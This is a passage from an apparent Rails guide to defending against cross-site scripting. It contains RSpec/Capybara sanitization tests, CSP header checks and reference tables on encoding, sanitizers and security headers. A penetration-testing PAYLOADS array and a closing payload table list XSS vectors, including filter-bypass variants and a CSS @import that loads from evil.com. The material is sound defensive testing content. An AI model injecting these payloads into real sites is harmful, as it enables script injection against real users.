  scenario "dangerous event handlers are removed" do
    visit article_path(article)
    
    xss_comment = '<img src=x onerror="alert(1)">'
    fill_in "Comment", with: xss_comment
    click_button "Post Comment"
    
    expect(page.html).not_to include("onerror")
  end
  
  scenario "safe formatting is preserved" do
    visit article_path(article)
    
    safe_comment = "Comment with <strong>bold</strong> and <em>italic</em>"
    fill_in "Comment", with: safe_comment
    click_button "Post Comment"
    
    expect(page).to have_selector("strong", text: "bold")
    expect(page).to have_selector("em", text: "italic")
  end
end

Manual penetration testing complements automated tests by exploring complex attack chains and context-specific vulnerabilities. Testers attempt various encoding schemes, nested payloads, and protocol handlers.

# Penetration testing checklist
module XssPenetrationTests
  PAYLOADS = [
    # Basic XSS
    "<script>alert(1)</script>",
    "<img src=x onerror=alert(1)>",
    "<svg onload=alert(1)>",
    
    # Encoded XSS
    "&#60;script&#62;alert(1)&#60;/script&#62;",
    "%3Cscript%3Ealert(1)%3C/script%3E",
    
    # Nested tags
    "<scr<script>ipt>alert(1)</scr</script>ipt>",
    
    # Event handlers
    "<body onload=alert(1)>",
    "<input onfocus=alert(1) autofocus>",
    
    # Protocol handlers
    '<a href="javascript:alert(1)">Link</a>',
    '<a href="data:text/html,<script>alert(1)</script>">Link</a>',
    
    # CSS-based XSS
    '<style>@import"http://evil.com/xss.css";</style>',
    
    # SVG-based XSS
    '<svg><script>alert(1)</script></svg>',
    
    # NULL byte injection
    "<script>alert(1)\x00</script>",
    
    # Unicode bypass
    "<script>alert\u0028'XSS'\u0029</script>"
  ]
  
  def self.test_input(field, value)
    PAYLOADS.each do |payload|
      test_payload(field, value + payload)
    end
  end
end

CSP validation tests ensure Content Security Policy headers appear correctly and block unauthorized resources.

# CSP testing
RSpec.describe "Content Security Policy", type: :request do
  it "sets strict CSP headers" do
    get root_path
    
    csp_header = response.headers['Content-Security-Policy']
    expect(csp_header).to include("default-src 'self'")
    expect(csp_header).to include("script-src 'self'")
    expect(csp_header).not_to include("unsafe-inline")
  end
  
  it "includes frame-ancestors protection" do
    get root_path
    
    csp_header = response.headers['Content-Security-Policy']
    expect(csp_header).to include("frame-ancestors 'none'")
  end
  
  it "sets X-Content-Type-Options" do
    get root_path
    
    expect(response.headers['X-Content-Type-Options']).to eq('nosniff')
  end
end

Reference

XSS Attack Vectors

Vector Type Example Prevention
Script Tag <script>alert(1)</script> HTML escape output
Image Error <img src=x onerror=alert(1)> Sanitize attributes
Event Handler <body onload=alert(1)> Remove event attributes
JavaScript URL <a href="javascript:alert(1)"> Validate URL schemes
SVG Inline <svg onload=alert(1)> Sanitize SVG content
Data URL <a href="data:text/html,<script>alert(1)"> Block data URLs
Form Action <form action="javascript:alert(1)"> Validate form targets
Meta Refresh <meta http-equiv="refresh" content="0;url=javascript:alert(1)"> Sanitize meta tags
CSS Expression <style>body{background:expression(alert(1))}</style> Block CSS expressions
Object/Embed <object data="javascript:alert(1)"> Remove object tags

Ruby Encoding Methods

Context Method Example
HTML Content CGI.escapeHTML Escapes <, >, &, ", '
HTML Attribute CGI.escapeHTML Same as HTML content
JavaScript String escape_javascript (j) Escapes quotes, newlines, slashes
URL Parameter CGI.escape Percent-encodes special characters
URL Component ERB::Util.url_encode Same as CGI.escape
JSON to_json + escape_javascript Safe JSON in JavaScript context

Rails Sanitizer Configuration

Option Values Purpose
tags Array of tag names Allowlist of permitted HTML tags
attributes Hash of tag => attributes Permitted attributes per tag
protocols Hash of attribute => schemes Allowed URL protocols
scrubber Custom scrubber object Advanced sanitization logic

Content Security Policy Directives

Directive Purpose Example Values
default-src Fallback for all resources 'self', 'none'
script-src JavaScript sources 'self', 'unsafe-inline', 'nonce-abc123'
style-src CSS sources 'self', 'unsafe-inline'
img-src Image sources 'self', https:, data:
font-src Font sources 'self', https://fonts.gstatic.com
connect-src AJAX/WebSocket targets 'self', https://api.example.com
frame-ancestors Embedding restrictions 'none', 'self'
base-uri Base tag restrictions 'self'
form-action Form submission targets 'self'

Security Headers

Header Value Purpose
Content-Security-Policy See CSP directives Restricts resource loading
X-Content-Type-Options nosniff Prevents MIME sniffing
X-Frame-Options DENY or SAMEORIGIN Prevents clickjacking
X-XSS-Protection 1; mode=block Enables XSS filter (legacy)
Referrer-Policy strict-origin-when-cross-origin Controls referrer info

Cookie Security Attributes

Attribute Purpose Setting
HttpOnly Prevents JavaScript access httponly: true
Secure HTTPS transmission only secure: true
SameSite CSRF protection same_site: :strict or :lax

Testing XSS Payloads

Payload Category Example
Basic HTML <script>alert(1)</script>
Encoded HTML &lt;script&gt;alert(1)&lt;/script&gt;
Event Handlers <img src=x onerror=alert(1)>
JavaScript Protocol <a href="javascript:alert(1)">
Nested Tags <scr<script>ipt>alert(1)</script>
NULL Byte <script>alert(1)\x00</script>
Unicode Encoding <script>alert\u0028'XSS'\u0029</script>
CSS Injection <style>@import'http://evil.com'</style>
SVG Vector <svg/onload=alert(1)>
Data URI <iframe src="data:text/html,<script>alert(1)">